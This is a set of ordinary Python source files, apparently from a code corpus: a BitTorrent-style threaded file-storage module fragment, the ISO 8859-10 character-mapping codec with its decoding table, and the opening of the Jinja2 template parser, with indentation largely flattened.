self.free_handle_condition.acquire()
self.active_file_to_handles.remove_fom_row(filename, handle)
self.open_file_to_handles.push_to_row(filename, handle)
self.free_handle_condition.notify()
self.free_handle_condition.release()
def _create_op(self, _f, *args, **kwargs):
df = Deferred()
self.diskq.put((df, _f, args, kwargs))
return df
read = _create_op
write = _create_op
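    # read and write are intentional aliases for _create_op: the caller
    # supplies the real file operation (e.g. Storage._read) as _f, and the
    # operation is queued for a disk thread instead of running inline; the
    # returned Deferred fires back on the event loop via external_add_task.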
def _disk_thread(self):
while not self.doneflag.isSet():
df, func, args, kwargs = self.diskq.get(True)
try:
v = func(*args, **kwargs)
except:
self.external_add_task(0, df.errback, Failure())
else:
self.external_add_task(0, df.callback, v)
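def _example_filepool_read(pool, filename, pos, amount):
    # Illustrative sketch only, not part of the original module: the
    # acquire/release discipline FilePool expects from callers. The file
    # must have been registered via add_files() first; otherwise
    # acquire_handle() raises UnregisteredFileException.
    handle = pool.acquire_handle(filename, for_write=False)
    try:
        handle.seek(pos)
        return handle.read(amount)
    finally:
        pool.release_handle(filename, handle)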
class Storage(object):
def __init__(self, config, filepool, save_path,
files, add_task,
external_add_task, doneflag):
self.filepool = filepool
self.config = config
self.doneflag = doneflag
self.add_task = add_task
self.external_add_task = external_add_task
self.initialize(save_path, files)
def initialize(self, save_path, files):
# a list of bytes ranges and filenames for window-based IO
self.ranges = []
# a dict of filename-to-ranges for piece priorities and filename lookup
self.range_by_name = {}
# a sparse set for smart allocation detection
self.allocated_regions = SparseSet()
# dict of filename-to-length on disk (for % complete in the file view)
self.undownloaded = {}
self.save_path = save_path
# Rather implement this as an ugly hack here than change all the
# individual calls. Affects all torrent instances using this module.
if self.config['bad_libc_workaround']:
bad_libc_workaround()
self.initialized = False
self.startup_df = ThreadedDeferred(wrap_task(self.external_add_task),
self._build_file_structs,
self.filepool, files)
return self.startup_df
def _build_file_structs(self, filepool, files):
total = 0
for filename, length in files:
# we're shutting down, abort.
if self.doneflag.isSet():
return False
self.undownloaded[filename] = length
if length > 0:
self.ranges.append((total, total + length, filename))
self.range_by_name[filename] = (total, total + length)
if os.path.exists(filename):
if not os.path.isfile(filename):
raise BTFailure(_("File %s already exists, but is not a "
"regular file") % filename)
l = os.path.getsize(filename)
if l > length:
# This is the truncation Bram was talking about that no one
# else thinks is a good idea.
#h = file(filename, 'rb+')
#make_file_sparse(filename, h, length)
#h.truncate(length)
#h.close()
l = length
a = get_allocated_regions(filename, begin=0, length=l)
if a is not None:
a.offset(total)
else:
a = SparseSet()
if l > 0:
a.add(total, total + l)
self.allocated_regions += a
total += length
self.total_length = total
self.initialized = True
return True
def get_byte_range_for_filename(self, filename):
if filename not in self.range_by_name:
filename = os.path.normpath(filename)
filename = os.path.join(self.save_path, filename)
return self.range_by_name[filename]
def was_preallocated(self, pos, length):
return self.allocated_regions.is_range_in(pos, pos+length)
def get_total_length(self):
return self.total_length
def _intervals(self, pos, amount):
r = []
stop = pos + amount
p = max(bisect_right(self.ranges, (pos, 2 ** 500)) - 1, 0)
for begin, end, filename in self.ranges[p:]:
if begin >= stop:
break
r.append((filename, max(pos, begin) - begin, min(end, stop) - begin))
return r
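    # Worked example (illustrative): with self.ranges ==
    # [(0, 100, 'a'), (100, 250, 'b')], _intervals(50, 100) returns
    # [('a', 50, 100), ('b', 0, 50)]: the tail of file 'a' plus the first
    # 50 bytes of file 'b', with offsets relative to the start of each file.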
def _read(self, filename, pos, amount):
begin, end = self.get_byte_range_for_filename(filename)
length = end - begin
h = self.filepool.acquire_handle(filename, for_write=False, length=length)
if h is None:
return
try:
h.seek(pos)
r = h.read(amount)
finally:
self.filepool.release_handle(filename, h)
return r
def _batch_read(self, pos, amount):
dfs = []
r = []
# queue all the reads
for filename, pos, end in self._intervals(pos, amount):
df = self.filepool.read(self._read, filename, pos, end - pos)
dfs.append(df)
# yield on all the reads in order - they complete in any order
exc = None
for df in dfs:
yield df
try:
r.append(df.getResult())
except:
exc = exc or sys.exc_info()
if exc:
raise exc[0], exc[1], exc[2]
r = ''.join(r)
if len(r) != amount:
raise BTFailure(_("Short read (%d of %d) - something truncated files?") %
(len(r), amount))
yield r
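    # Note: _batch_read is driven by launch_coroutine (see read() below);
    # each yielded Deferred is waited on before the generator resumes, and
    # the final ``yield r`` delivers the joined data as the overall result.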
def read(self, pos, amount):
df = launch_coroutine(wrap_task(self.add_task),
self._batch_read, pos, amount)
return df
def _write(self, filename, pos, s):
begin, end = self.get_byte_range_for_filename(filename)
length = end - begin
h = self.filepool.acquire_handle(filename, for_write=True, length=length)
if h is None:
return
try:
h.seek(pos)
h.write(s)
finally:
self.filepool.release_handle(filename, h)
return len(s)
def _batch_write(self, pos, s):
dfs = []
total = 0
amount = len(s)
# queue all the writes
for filename, begin, end in self._intervals(pos, amount):
length = end - begin
d = buffer(s, total, length)
total += length
df = self.filepool.write(self._write, filename, begin, d)
dfs.append(df)
# yield on all the writes - they complete in any order
exc = None
for df in dfs:
yield df
try:
df.getResult()
except:
exc = exc or sys.exc_info()
if exc:
raise exc[0], exc[1], exc[2]
yield total
def write(self, pos, s):
df = launch_coroutine(wrap_task(self.add_task),
self._batch_write, pos, s)
return df
def close(self):
if not self.initialized:
self.startup_df.addCallback(lambda *a : self.filepool.close_files(self.range_by_name))
return self.startup_df
self.filepool.close_files(self.range_by_name)
def downloaded(self, pos, length):
for filename, begin, end in self._intervals(pos, length):
self.undownloaded[filename] -= end - begin
| mit |
jcoady9/python-for-android | python3-alpha/python3-src/Lib/encodings/iso8859_10.py | 272 | 13589 | """ Python Character Mapping Codec iso8859_10 generated from 'MAPPINGS/ISO8859/8859-10.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='iso8859-10',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
'\x00' # 0x00 -> NULL
'\x01' # 0x01 -> START OF HEADING
'\x02' # 0x02 -> START OF TEXT
'\x03' # 0x03 -> END OF TEXT
'\x04' # 0x04 -> END OF TRANSMISSION
'\x05' # 0x05 -> ENQUIRY
'\x06' # 0x06 -> ACKNOWLEDGE
'\x07' # 0x07 -> BELL
'\x08' # 0x08 -> BACKSPACE
'\t' # 0x09 -> HORIZONTAL TABULATION
'\n' # 0x0A -> LINE FEED
'\x0b' # 0x0B -> VERTICAL TABULATION
'\x0c' # 0x0C -> FORM FEED
'\r' # 0x0D -> CARRIAGE RETURN
'\x0e' # 0x0E -> SHIFT OUT
'\x0f' # 0x0F -> SHIFT IN
'\x10' # 0x10 -> DATA LINK ESCAPE
'\x11' # 0x11 -> DEVICE CONTROL ONE
'\x12' # 0x12 -> DEVICE CONTROL TWO
'\x13' # 0x13 -> DEVICE CONTROL THREE
'\x14' # 0x14 -> DEVICE CONTROL FOUR
'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
'\x16' # 0x16 -> SYNCHRONOUS IDLE
'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
'\x18' # 0x18 -> CANCEL
'\x19' # 0x19 -> END OF MEDIUM
'\x1a' # 0x1A -> SUBSTITUTE
'\x1b' # 0x1B -> ESCAPE
'\x1c' # 0x1C -> FILE SEPARATOR
'\x1d' # 0x1D -> GROUP SEPARATOR
'\x1e' # 0x1E -> RECORD SEPARATOR
'\x1f' # 0x1F -> UNIT SEPARATOR
' ' # 0x20 -> SPACE
'!' # 0x21 -> EXCLAMATION MARK
'"' # 0x22 -> QUOTATION MARK
'#' # 0x23 -> NUMBER SIGN
'$' # 0x24 -> DOLLAR SIGN
'%' # 0x25 -> PERCENT SIGN
'&' # 0x26 -> AMPERSAND
"'" # 0x27 -> APOSTROPHE
'(' # 0x28 -> LEFT PARENTHESIS
')' # 0x29 -> RIGHT PARENTHESIS
'*' # 0x2A -> ASTERISK
'+' # 0x2B -> PLUS SIGN
',' # 0x2C -> COMMA
'-' # 0x2D -> HYPHEN-MINUS
'.' # 0x2E -> FULL STOP
'/' # 0x2F -> SOLIDUS
'0' # 0x30 -> DIGIT ZERO
'1' # 0x31 -> DIGIT ONE
'2' # 0x32 -> DIGIT TWO
'3' # 0x33 -> DIGIT THREE
'4' # 0x34 -> DIGIT FOUR
'5' # 0x35 -> DIGIT FIVE
'6' # 0x36 -> DIGIT SIX
'7' # 0x37 -> DIGIT SEVEN
'8' # 0x38 -> DIGIT EIGHT
'9' # 0x39 -> DIGIT NINE
':' # 0x3A -> COLON
';' # 0x3B -> SEMICOLON
'<' # 0x3C -> LESS-THAN SIGN
'=' # 0x3D -> EQUALS SIGN
'>' # 0x3E -> GREATER-THAN SIGN
'?' # 0x3F -> QUESTION MARK
'@' # 0x40 -> COMMERCIAL AT
'A' # 0x41 -> LATIN CAPITAL LETTER A
'B' # 0x42 -> LATIN CAPITAL LETTER B
'C' # 0x43 -> LATIN CAPITAL LETTER C
'D' # 0x44 -> LATIN CAPITAL LETTER D
'E' # 0x45 -> LATIN CAPITAL LETTER E
'F' # 0x46 -> LATIN CAPITAL LETTER F
'G' # 0x47 -> LATIN CAPITAL LETTER G
'H' # 0x48 -> LATIN CAPITAL LETTER H
'I' # 0x49 -> LATIN CAPITAL LETTER I
'J' # 0x4A -> LATIN CAPITAL LETTER J
'K' # 0x4B -> LATIN CAPITAL LETTER K
'L' # 0x4C -> LATIN CAPITAL LETTER L
'M' # 0x4D -> LATIN CAPITAL LETTER M
'N' # 0x4E -> LATIN CAPITAL LETTER N
'O' # 0x4F -> LATIN CAPITAL LETTER O
'P' # 0x50 -> LATIN CAPITAL LETTER P
'Q' # 0x51 -> LATIN CAPITAL LETTER Q
'R' # 0x52 -> LATIN CAPITAL LETTER R
'S' # 0x53 -> LATIN CAPITAL LETTER S
'T' # 0x54 -> LATIN CAPITAL LETTER T
'U' # 0x55 -> LATIN CAPITAL LETTER U
'V' # 0x56 -> LATIN CAPITAL LETTER V
'W' # 0x57 -> LATIN CAPITAL LETTER W
'X' # 0x58 -> LATIN CAPITAL LETTER X
'Y' # 0x59 -> LATIN CAPITAL LETTER Y
'Z' # 0x5A -> LATIN CAPITAL LETTER Z
'[' # 0x5B -> LEFT SQUARE BRACKET
'\\' # 0x5C -> REVERSE SOLIDUS
']' # 0x5D -> RIGHT SQUARE BRACKET
'^' # 0x5E -> CIRCUMFLEX ACCENT
'_' # 0x5F -> LOW LINE
'`' # 0x60 -> GRAVE ACCENT
'a' # 0x61 -> LATIN SMALL LETTER A
'b' # 0x62 -> LATIN SMALL LETTER B
'c' # 0x63 -> LATIN SMALL LETTER C
'd' # 0x64 -> LATIN SMALL LETTER D
'e' # 0x65 -> LATIN SMALL LETTER E
'f' # 0x66 -> LATIN SMALL LETTER F
'g' # 0x67 -> LATIN SMALL LETTER G
'h' # 0x68 -> LATIN SMALL LETTER H
'i' # 0x69 -> LATIN SMALL LETTER I
'j' # 0x6A -> LATIN SMALL LETTER J
'k' # 0x6B -> LATIN SMALL LETTER K
'l' # 0x6C -> LATIN SMALL LETTER L
'm' # 0x6D -> LATIN SMALL LETTER M
'n' # 0x6E -> LATIN SMALL LETTER N
'o' # 0x6F -> LATIN SMALL LETTER O
'p' # 0x70 -> LATIN SMALL LETTER P
'q' # 0x71 -> LATIN SMALL LETTER Q
'r' # 0x72 -> LATIN SMALL LETTER R
's' # 0x73 -> LATIN SMALL LETTER S
't' # 0x74 -> LATIN SMALL LETTER T
'u' # 0x75 -> LATIN SMALL LETTER U
'v' # 0x76 -> LATIN SMALL LETTER V
'w' # 0x77 -> LATIN SMALL LETTER W
'x' # 0x78 -> LATIN SMALL LETTER X
'y' # 0x79 -> LATIN SMALL LETTER Y
'z' # 0x7A -> LATIN SMALL LETTER Z
'{' # 0x7B -> LEFT CURLY BRACKET
'|' # 0x7C -> VERTICAL LINE
'}' # 0x7D -> RIGHT CURLY BRACKET
'~' # 0x7E -> TILDE
'\x7f' # 0x7F -> DELETE
'\x80' # 0x80 -> <control>
'\x81' # 0x81 -> <control>
'\x82' # 0x82 -> <control>
'\x83' # 0x83 -> <control>
'\x84' # 0x84 -> <control>
'\x85' # 0x85 -> <control>
'\x86' # 0x86 -> <control>
'\x87' # 0x87 -> <control>
'\x88' # 0x88 -> <control>
'\x89' # 0x89 -> <control>
'\x8a' # 0x8A -> <control>
'\x8b' # 0x8B -> <control>
'\x8c' # 0x8C -> <control>
'\x8d' # 0x8D -> <control>
'\x8e' # 0x8E -> <control>
'\x8f' # 0x8F -> <control>
'\x90' # 0x90 -> <control>
'\x91' # 0x91 -> <control>
'\x92' # 0x92 -> <control>
'\x93' # 0x93 -> <control>
'\x94' # 0x94 -> <control>
'\x95' # 0x95 -> <control>
'\x96' # 0x96 -> <control>
'\x97' # 0x97 -> <control>
'\x98' # 0x98 -> <control>
'\x99' # 0x99 -> <control>
'\x9a' # 0x9A -> <control>
'\x9b' # 0x9B -> <control>
'\x9c' # 0x9C -> <control>
'\x9d' # 0x9D -> <control>
'\x9e' # 0x9E -> <control>
'\x9f' # 0x9F -> <control>
'\xa0' # 0xA0 -> NO-BREAK SPACE
'\u0104' # 0xA1 -> LATIN CAPITAL LETTER A WITH OGONEK
'\u0112' # 0xA2 -> LATIN CAPITAL LETTER E WITH MACRON
'\u0122' # 0xA3 -> LATIN CAPITAL LETTER G WITH CEDILLA
'\u012a' # 0xA4 -> LATIN CAPITAL LETTER I WITH MACRON
'\u0128' # 0xA5 -> LATIN CAPITAL LETTER I WITH TILDE
'\u0136' # 0xA6 -> LATIN CAPITAL LETTER K WITH CEDILLA
'\xa7' # 0xA7 -> SECTION SIGN
'\u013b' # 0xA8 -> LATIN CAPITAL LETTER L WITH CEDILLA
'\u0110' # 0xA9 -> LATIN CAPITAL LETTER D WITH STROKE
'\u0160' # 0xAA -> LATIN CAPITAL LETTER S WITH CARON
'\u0166' # 0xAB -> LATIN CAPITAL LETTER T WITH STROKE
'\u017d' # 0xAC -> LATIN CAPITAL LETTER Z WITH CARON
'\xad' # 0xAD -> SOFT HYPHEN
'\u016a' # 0xAE -> LATIN CAPITAL LETTER U WITH MACRON
'\u014a' # 0xAF -> LATIN CAPITAL LETTER ENG
'\xb0' # 0xB0 -> DEGREE SIGN
'\u0105' # 0xB1 -> LATIN SMALL LETTER A WITH OGONEK
'\u0113' # 0xB2 -> LATIN SMALL LETTER E WITH MACRON
'\u0123' # 0xB3 -> LATIN SMALL LETTER G WITH CEDILLA
'\u012b' # 0xB4 -> LATIN SMALL LETTER I WITH MACRON
'\u0129' # 0xB5 -> LATIN SMALL LETTER I WITH TILDE
'\u0137' # 0xB6 -> LATIN SMALL LETTER K WITH CEDILLA
'\xb7' # 0xB7 -> MIDDLE DOT
'\u013c' # 0xB8 -> LATIN SMALL LETTER L WITH CEDILLA
'\u0111' # 0xB9 -> LATIN SMALL LETTER D WITH STROKE
'\u0161' # 0xBA -> LATIN SMALL LETTER S WITH CARON
'\u0167' # 0xBB -> LATIN SMALL LETTER T WITH STROKE
'\u017e' # 0xBC -> LATIN SMALL LETTER Z WITH CARON
'\u2015' # 0xBD -> HORIZONTAL BAR
'\u016b' # 0xBE -> LATIN SMALL LETTER U WITH MACRON
'\u014b' # 0xBF -> LATIN SMALL LETTER ENG
'\u0100' # 0xC0 -> LATIN CAPITAL LETTER A WITH MACRON
'\xc1' # 0xC1 -> LATIN CAPITAL LETTER A WITH ACUTE
'\xc2' # 0xC2 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
'\xc3' # 0xC3 -> LATIN CAPITAL LETTER A WITH TILDE
'\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS
'\xc5' # 0xC5 -> LATIN CAPITAL LETTER A WITH RING ABOVE
'\xc6' # 0xC6 -> LATIN CAPITAL LETTER AE
'\u012e' # 0xC7 -> LATIN CAPITAL LETTER I WITH OGONEK
'\u010c' # 0xC8 -> LATIN CAPITAL LETTER C WITH CARON
'\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE
'\u0118' # 0xCA -> LATIN CAPITAL LETTER E WITH OGONEK
'\xcb' # 0xCB -> LATIN CAPITAL LETTER E WITH DIAERESIS
'\u0116' # 0xCC -> LATIN CAPITAL LETTER E WITH DOT ABOVE
'\xcd' # 0xCD -> LATIN CAPITAL LETTER I WITH ACUTE
'\xce' # 0xCE -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
'\xcf' # 0xCF -> LATIN CAPITAL LETTER I WITH DIAERESIS
'\xd0' # 0xD0 -> LATIN CAPITAL LETTER ETH (Icelandic)
'\u0145' # 0xD1 -> LATIN CAPITAL LETTER N WITH CEDILLA
'\u014c' # 0xD2 -> LATIN CAPITAL LETTER O WITH MACRON
'\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE
'\xd4' # 0xD4 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
'\xd5' # 0xD5 -> LATIN CAPITAL LETTER O WITH TILDE
'\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS
'\u0168' # 0xD7 -> LATIN CAPITAL LETTER U WITH TILDE
'\xd8' # 0xD8 -> LATIN CAPITAL LETTER O WITH STROKE
'\u0172' # 0xD9 -> LATIN CAPITAL LETTER U WITH OGONEK
'\xda' # 0xDA -> LATIN CAPITAL LETTER U WITH ACUTE
'\xdb' # 0xDB -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
'\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS
'\xdd' # 0xDD -> LATIN CAPITAL LETTER Y WITH ACUTE
'\xde' # 0xDE -> LATIN CAPITAL LETTER THORN (Icelandic)
'\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S (German)
'\u0101' # 0xE0 -> LATIN SMALL LETTER A WITH MACRON
'\xe1' # 0xE1 -> LATIN SMALL LETTER A WITH ACUTE
'\xe2' # 0xE2 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
'\xe3' # 0xE3 -> LATIN SMALL LETTER A WITH TILDE
'\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS
'\xe5' # 0xE5 -> LATIN SMALL LETTER A WITH RING ABOVE
'\xe6' # 0xE6 -> LATIN SMALL LETTER AE
'\u012f' # 0xE7 -> LATIN SMALL LETTER I WITH OGONEK
'\u010d' # 0xE8 -> LATIN SMALL LETTER C WITH CARON
'\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE
'\u0119' # 0xEA -> LATIN SMALL LETTER E WITH OGONEK
'\xeb' # 0xEB -> LATIN SMALL LETTER E WITH DIAERESIS
'\u0117' # 0xEC -> LATIN SMALL LETTER E WITH DOT ABOVE
'\xed' # 0xED -> LATIN SMALL LETTER I WITH ACUTE
'\xee' # 0xEE -> LATIN SMALL LETTER I WITH CIRCUMFLEX
'\xef' # 0xEF -> LATIN SMALL LETTER I WITH DIAERESIS
'\xf0' # 0xF0 -> LATIN SMALL LETTER ETH (Icelandic)
'\u0146' # 0xF1 -> LATIN SMALL LETTER N WITH CEDILLA
'\u014d' # 0xF2 -> LATIN SMALL LETTER O WITH MACRON
'\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE
'\xf4' # 0xF4 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
'\xf5' # 0xF5 -> LATIN SMALL LETTER O WITH TILDE
'\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS
'\u0169' # 0xF7 -> LATIN SMALL LETTER U WITH TILDE
'\xf8' # 0xF8 -> LATIN SMALL LETTER O WITH STROKE
'\u0173' # 0xF9 -> LATIN SMALL LETTER U WITH OGONEK
'\xfa' # 0xFA -> LATIN SMALL LETTER U WITH ACUTE
'\xfb' # 0xFB -> LATIN SMALL LETTER U WITH CIRCUMFLEX
'\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS
'\xfd' # 0xFD -> LATIN SMALL LETTER Y WITH ACUTE
'\xfe' # 0xFE -> LATIN SMALL LETTER THORN (Icelandic)
'\u0138' # 0xFF -> LATIN SMALL LETTER KRA
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
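# Example (illustrative, not part of the generated file): once the encodings
# package registers this codec, it round-trips through the tables above,
# e.g. '\u0104'.encode('iso8859-10') == b'\xa1' and
# b'\xa1'.decode('iso8859-10') == '\u0104'.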
| apache-2.0 |
xxhank/namebench | nb_third_party/jinja2/parser.py | 215 | 34717 | # -*- coding: utf-8 -*-
"""
jinja2.parser
~~~~~~~~~~~~~
Implements the template parser.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
from jinja2 import nodes
from jinja2.exceptions import TemplateSyntaxError, TemplateAssertionError
from jinja2.utils import next
from jinja2.lexer import describe_token, describe_token_expr
#: statements that call into a dedicated parse_<name>() method below
_statement_keywords = frozenset(['for', 'if', 'block', 'extends', 'print',
'macro', 'include', 'from', 'import',
'set'])
_compare_operators = frozenset(['eq', 'ne', 'lt', 'lteq', 'gt', 'gteq'])
class Parser(object):
"""This is the central parsing class Jinja2 uses. It's passed to
extensions and can be used to parse expressions or statements.
"""
def __init__(self, environment, source, name=None, filename=None,
state=None):
self.environment = environment
self.stream = environment._tokenize(source, name, filename, state)
self.name = name
self.filename = filename
self.closed = False
self.extensions = {}
for extension in environment.iter_extensions():
for tag in extension.tags:
self.extensions[tag] = extension.parse
self._last_identifier = 0
self._tag_stack = []
self._end_token_stack = []
def fail(self, msg, lineno=None, exc=TemplateSyntaxError):
"""Convenience method that raises `exc` with the message, passed
line number or last line number as well as the current name and
filename.
"""
if lineno is None:
lineno = self.stream.current.lineno
raise exc(msg, lineno, self.name, self.filename)
def _fail_ut_eof(self, name, end_token_stack, lineno):
expected = []
for exprs in end_token_stack:
expected.extend(map(describe_token_expr, exprs))
if end_token_stack:
currently_looking = ' or '.join(
"'%s'" % describe_token_expr(expr)
for expr in end_token_stack[-1])
else:
currently_looking = None
if name is None:
message = ['Unexpected end of template.']
else:
message = ['Encountered unknown tag \'%s\'.' % name]
if currently_looking:
if name is not None and name in expected:
message.append('You probably made a nesting mistake. Jinja '
'is expecting this tag, but currently looking '
'for %s.' % currently_looking)
else:
message.append('Jinja was looking for the following tags: '
'%s.' % currently_looking)
if self._tag_stack:
message.append('The innermost block that needs to be '
'closed is \'%s\'.' % self._tag_stack[-1])
self.fail(' '.join(message), lineno)
def fail_unknown_tag(self, name, lineno=None):
"""Called if the parser encounters an unknown tag. Tries to fail
with a human readable error message that could help to identify
the problem.
"""
return self._fail_ut_eof(name, self._end_token_stack, lineno)
def fail_eof(self, end_tokens=None, lineno=None):
"""Like fail_unknown_tag but for end of template situations."""
stack = list(self._end_token_stack)
if end_tokens is not None:
stack.append(end_tokens)
return self._fail_ut_eof(None, stack, lineno)
def is_tuple_end(self, extra_end_rules=None):
"""Are we at the end of a tuple?"""
if self.stream.current.type in ('variable_end', 'block_end', 'rparen'):
return True
elif extra_end_rules is not None:
return self.stream.current.test_any(extra_end_rules)
return False
def free_identifier(self, lineno=None):
"""Return a new free identifier as :class:`~jinja2.nodes.InternalName`."""
self._last_identifier += 1
rv = object.__new__(nodes.InternalName)
nodes.Node.__init__(rv, 'fi%d' % self._last_identifier, lineno=lineno)
return rv
def parse_statement(self):
"""Parse a single statement."""
token = self.stream.current
if token.type != 'name':
self.fail('tag name expected', token.lineno)
self._tag_stack.append(token.value)
pop_tag = True
try:
if token.value in _statement_keywords:
return getattr(self, 'parse_' + self.stream.current.value)()
if token.value == 'call':
return self.parse_call_block()
if token.value == 'filter':
return self.parse_filter_block()
ext = self.extensions.get(token.value)
if ext is not None:
return ext(self)
# did not work out, remove the token we pushed by accident
# from the stack so that the unknown tag fail function can
# produce a proper error message.
self._tag_stack.pop()
pop_tag = False
self.fail_unknown_tag(token.value, token.lineno)
finally:
if pop_tag:
self._tag_stack.pop()
def parse_statements(self, end_tokens, drop_needle=False):
"""Parse multiple statements into a list until one of the end tokens
is reached. This is used to parse the body of statements as it also
parses template data if appropriate. The parser checks first if the
current token is a colon and skips it if there is one. Then it checks
for the block end and parses until if one of the `end_tokens` is
reached. Per default the active token in the stream at the end of
the call is the matched end token. If this is not wanted `drop_needle`
can be set to `True` and the end token is removed.
"""
# the first token may be a colon for python compatibility
self.stream.skip_if('colon')
# in the future it would be possible to add whole code sections
# by adding some sort of end of statement token and parsing those here.
self.stream.expect('block_end')
result = self.subparse(end_tokens)
# we reached the end of the template too early, the subparser
# does not check for this, so we do that now
if self.stream.current.type == 'eof':
self.fail_eof(end_tokens)
if drop_needle:
next(self.stream)
return result
def parse_set(self):
"""Parse an assign statement."""
lineno = next(self.stream).lineno
target = self.parse_assign_target()
self.stream.expect('assign')
expr = self.parse_tuple()
return nodes.Assign(target, expr, lineno=lineno)
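    # Example (illustrative): ``{% set x = 42 %}`` produces
    # Assign(Name('x', 'store'), Const(42)).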
def parse_for(self):
"""Parse a for loop."""
lineno = self.stream.expect('name:for').lineno
target = self.parse_assign_target(extra_end_rules=('name:in',))
self.stream.expect('name:in')
iter = self.parse_tuple(with_condexpr=False,
extra_end_rules=('name:recursive',))
test = None
if self.stream.skip_if('name:if'):
test = self.parse_expression()
recursive = self.stream.skip_if('name:recursive')
body = self.parse_statements(('name:endfor', 'name:else'))
if next(self.stream).value == 'endfor':
else_ = []
else:
else_ = self.parse_statements(('name:endfor',), drop_needle=True)
return nodes.For(target, iter, body, else_, test,
recursive, lineno=lineno)
def parse_if(self):
"""Parse an if construct."""
node = result = nodes.If(lineno=self.stream.expect('name:if').lineno)
while 1:
node.test = self.parse_tuple(with_condexpr=False)
node.body = self.parse_statements(('name:elif', 'name:else',
'name:endif'))
token = next(self.stream)
if token.test('name:elif'):
new_node = nodes.If(lineno=self.stream.current.lineno)
node.else_ = [new_node]
node = new_node
continue
elif token.test('name:else'):
node.else_ = self.parse_statements(('name:endif',),
drop_needle=True)
else:
node.else_ = []
break
return result
def parse_block(self):
node = nodes.Block(lineno=next(self.stream).lineno)
node.name = self.stream.expect('name').value
node.scoped = self.stream.skip_if('name:scoped')
# common problem people encounter when switching from django
# to jinja. we do not support hyphens in block names, so let's
# raise a nicer error message in that case.
if self.stream.current.type == 'sub':
self.fail('Block names in Jinja have to be valid Python '
                      'identifiers and may not contain hyphens, use an '
'underscore instead.')
node.body = self.parse_statements(('name:endblock',), drop_needle=True)
self.stream.skip_if('name:' + node.name)
return node
def parse_extends(self):
node = nodes.Extends(lineno=next(self.stream).lineno)
node.template = self.parse_expression()
return node
def parse_import_context(self, node, default):
if self.stream.current.test_any('name:with', 'name:without') and \
self.stream.look().test('name:context'):
node.with_context = next(self.stream).value == 'with'
self.stream.skip()
else:
node.with_context = default
return node
def parse_include(self):
node = nodes.Include(lineno=next(self.stream).lineno)
node.template = self.parse_expression()
if self.stream.current.test('name:ignore') and \
self.stream.look().test('name:missing'):
node.ignore_missing = True
self.stream.skip(2)
else:
node.ignore_missing = False
return self.parse_import_context(node, True)
def parse_import(self):
node = nodes.Import(lineno=next(self.stream).lineno)
node.template = self.parse_expression()
self.stream.expect('name:as')
node.target = self.parse_assign_target(name_only=True).name
return self.parse_import_context(node, False)
def parse_from(self):
node = nodes.FromImport(lineno=next(self.stream).lineno)
node.template = self.parse_expression()
self.stream.expect('name:import')
node.names = []
def parse_context():
if self.stream.current.value in ('with', 'without') and \
self.stream.look().test('name:context'):
node.with_context = next(self.stream).value == 'with'
self.stream.skip()
return True
return False
while 1:
if node.names:
self.stream.expect('comma')
if self.stream.current.type == 'name':
if parse_context():
break
target = self.parse_assign_target(name_only=True)
if target.name.startswith('_'):
self.fail('names starting with an underline can not '
'be imported', target.lineno,
exc=TemplateAssertionError)
if self.stream.skip_if('name:as'):
alias = self.parse_assign_target(name_only=True)
node.names.append((target.name, alias.name))
else:
node.names.append(target.name)
if parse_context() or self.stream.current.type != 'comma':
break
else:
break
if not hasattr(node, 'with_context'):
node.with_context = False
self.stream.skip_if('comma')
return node
def parse_signature(self, node):
node.args = args = []
node.defaults = defaults = []
self.stream.expect('lparen')
while self.stream.current.type != 'rparen':
if args:
self.stream.expect('comma')
arg = self.parse_assign_target(name_only=True)
arg.set_ctx('param')
if self.stream.skip_if('assign'):
defaults.append(self.parse_expression())
args.append(arg)
self.stream.expect('rparen')
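    # Example (illustrative): for ``{% macro input(name, value='') %}`` this
    # fills node.args with Name('name') and Name('value') (ctx 'param') and
    # node.defaults with the single Const('') for the trailing argument.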
def parse_call_block(self):
node = nodes.CallBlock(lineno=next(self.stream).lineno)
if self.stream.current.type == 'lparen':
self.parse_signature(node)
else:
node.args = []
node.defaults = []
node.call = self.parse_expression()
if not isinstance(node.call, nodes.Call):
self.fail('expected call', node.lineno)
node.body = self.parse_statements(('name:endcall',), drop_needle=True)
return node
def parse_filter_block(self):
node = nodes.FilterBlock(lineno=next(self.stream).lineno)
node.filter = self.parse_filter(None, start_inline=True)
node.body = self.parse_statements(('name:endfilter',),
drop_needle=True)
return node
def parse_macro(self):
node = nodes.Macro(lineno=next(self.stream).lineno)
node.name = self.parse_assign_target(name_only=True).name
self.parse_signature(node)
